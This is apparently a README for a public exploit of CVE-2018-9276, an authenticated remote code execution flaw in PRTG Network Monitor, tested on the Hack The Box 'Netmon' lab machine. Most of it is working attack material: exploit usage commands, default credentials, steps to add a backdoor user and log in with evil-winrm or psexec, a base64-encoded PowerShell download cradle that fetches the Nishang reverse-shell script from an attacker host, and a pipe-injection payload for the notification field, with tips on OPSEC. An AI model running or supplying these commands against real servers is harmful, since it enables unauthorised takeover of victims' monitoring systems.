CVE-2018-9276 PRTG < 18.2.39 Reverse Shell (Python3 support)
- Impacket (python3 version)
- Netcat
- Msfvenom
git clone https://github.com/A1vinSmith/CVE-2018-9276.git
./exploit.py -i targetIP -p targetPort --lhost hostIP --lport hostPort --user user --password pass
- The credentials are needed for performing the exploit. Try default credentials
prtgadmin:prtgadmin. And It might be worth checking the database or log to gain them. https://kb.paessler.com/en/topic/463-how-and-where-does-prtg-store-its-data - Try
--lport 445if the port has not been occupied - There are few twisted comments in the code. They might need some modifications.
- It might take few attempts to succeed. Reboot a target machine is always a good option. Especially when your payload causes some impact.
HTB Netmon box
OS Name: Microsoft Windows Server 2016 Standard
OS Version: 10.0.14393 N/A Build 14393
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00376-30821-30176-AA362
Original Install Date: 2/3/2019, 7:05:45 AM
System Boot Time: 7/28/2021, 9:02:41 PM
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
A Big Thank you for wildkindcc's python2 version https://github.com/wildkindcc/CVE-2018-9276
https://www.rapid7.com/db/modules/exploit/windows/http/prtg_authenticated_rce/
https://www.exploit-db.com/exploits/46527
https://github.com/chcx/PRTG-Network-Monitor-RCE
The credentials are needed for performing the exploit. First login and get the authenticated cookie to add a new user.
./prtg-exploit.sh -u http://10.10.10.10 -c "OCTOPUS1813713946=XXX"
// Login as the new user via evil-winrm
evil-winrm -i 10.10.10.10 -u pentest -p 'P3nT3st!'
// or alternative psexec.py
python3 /path/etc/impacket/examples/psexec.py pentest:'P3nT3st!'@10.10.10.10
POC: https://www.codewatch.org/blog/?p=453 Plus using SMB to get reverse shell https://github.com/A1vinSmith/OSCP-PWK/wiki/Samba-SMB
In case we don’t want to add a user, for better OPSEC we can get a reverse shell. However due to HTML encoding many characters get encoded. We can bypass this using powershell base64 execution. We need to create a base64 encoded command. However, it should be in the encoding which WIndows uses i.e UTF-16LE
❯ echo -n "IEX(new-object net.webclient).downloadstring('http://10.10.10.100/Invoke-PowerShellTcp.ps1' )" | iconv -t UTF-16LE | base64 -w0
SQBFAFgAKABu...SNIP...HMAMQAnACAAKQA=
We use iconv to convert it to target encoding and will execute this reverse shell from Nishang. https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1
Download the script and echo in the command to the last line.
wget https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1
echo 'Invoke-PowerShellTcp -Reverse -IPAddress 10.10.10.100 -Port 4444' >> Invoke-PowerShellTcp.ps1
Now start a simple HTTP server and create a new notification
python3 -m http.server 80
Click on Setup > Account Settings > Notifications -> click on “Add new notification” on the extreme right Trigger the notification by clicking the Bell button
abc.txt | powershell -enc SQBFAFgAKABu...SNIP...HMAMQAnACAAKQA=
